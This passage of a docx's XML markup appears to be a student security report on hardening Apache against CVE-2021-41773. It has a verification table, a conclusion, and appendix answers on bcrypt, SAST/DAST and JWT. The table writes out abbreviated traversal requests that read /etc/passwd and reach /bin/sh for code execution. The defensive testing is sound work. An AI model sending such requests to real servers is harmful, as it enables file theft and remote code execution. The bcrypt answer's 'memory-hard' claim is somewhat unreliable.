        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F8"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;Directory /&gt;</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    AllowOverride None</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    Require all denied</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>&lt;/Directory&gt;</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>#LoadModule cgi_module modules/mod_cgi.so   # only if the app needs CGI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4.51 decodes fully before handling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, which closes the class rather than one</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">payload. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Require all denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> removes condition 2 and not loading </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>mod_cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>removes condition 3, so the fix survives a future normalisation bug.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Measured on two builds running side by side — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2.4.49</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> on port 8080 and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2.4.51</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>on 8081, identical Dockerfiles apart from the base tag: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  <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Build</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Observed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EE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  <w:t>Interpretation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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2.4.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /icons/.%2e/…/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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2.4.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /cgi-bin/.%2e/…/bin/sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>uid=1(daemon)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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2.4.49 (stock config)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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same traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>403</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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config layer alone contains it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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2.4.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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same traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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  <w:t>`400 Bad Request`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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2.4.51</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET /</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2324"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
                <w:color w:val="9C272E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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regression test passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The patched build answers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>400</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>: the request is rejected during path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>normalisation, before any filesystem lookup, which is exactly the shape of the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>fix. The stock-config row is the control that proves the second, independent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">layer: with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Require all denied</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> restored, the same payload never gets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>authorised even on the vulnerable version.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>docs/screenshots/11-cve-passwd.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>12-cve-rce.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>15-cve-fixed-400.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>16-cve-regression.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>17-cve-stock-403.png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The API is secure against the three required failure classes, and each defence is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pinned by a test that fails if the defence is removed — which is what makes the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pipeline meaningful rather than decorative. The CVE half shows the same lesson</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>from the other side: CVE-2021-41773 was not a missing check but a check performed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>on the wrong string, and the patch that only added a pattern (2.4.50) failed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>within three days. Ordering, canonicalisation and default-deny are the transferable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ideas; the payload is incidental.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="D0D0D0"/>
          <w:sz w:val="12"/>
        </w:rPr>
        <w:t>______________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix — Control questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. Why is bcrypt preferable to SHA-256 for passwords?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SHA-256 is designed to be fast: a GPU tests billions of candidates per second, and</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>an unsalted hash lets one precomputed table attack every user at once. bcrypt is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>deliberately slow, memory-hard enough to resist GPU/ASIC parallelism, and embeds a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>per-password salt plus a cost parameter inside the digest, so the work factor can</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>be raised as hardware improves. SHA-256 also has no built-in key stretching, so</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>one leaked database is immediately crackable for common passwords.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. SAST vs DAST?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SAST analyses source or bytecode without executing the program: it sees every</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>branch, including unreachable-in-practice code, and reports early in the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>development cycle, but it cannot judge runtime configuration or actual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>exploitability, so it produces false positives. DAST attacks a running instance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>from the outside: it only reports what is genuinely reachable, and it catches</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>configuration and deployment issues, but it has no visibility into the code, can</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>miss internal paths, and needs a running environment plus authentication handling.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. How does a JWT work?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Three base64url parts: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (algorithm, type), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (claims — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>iat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, plus application claims such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>role</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, computed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>header.payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the server's secret (HMAC) or private key (RSA/ECDSA).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The server verifies the signature with its key and validates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Consolas"/>
          <w:color w:val="9C272E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>nbf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>; it does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>not need a session store, which is what makes it stateless. Crucially the payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">is only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>encoded</w:t>
      </w:r>
      <w:r>
        <w:rPr>
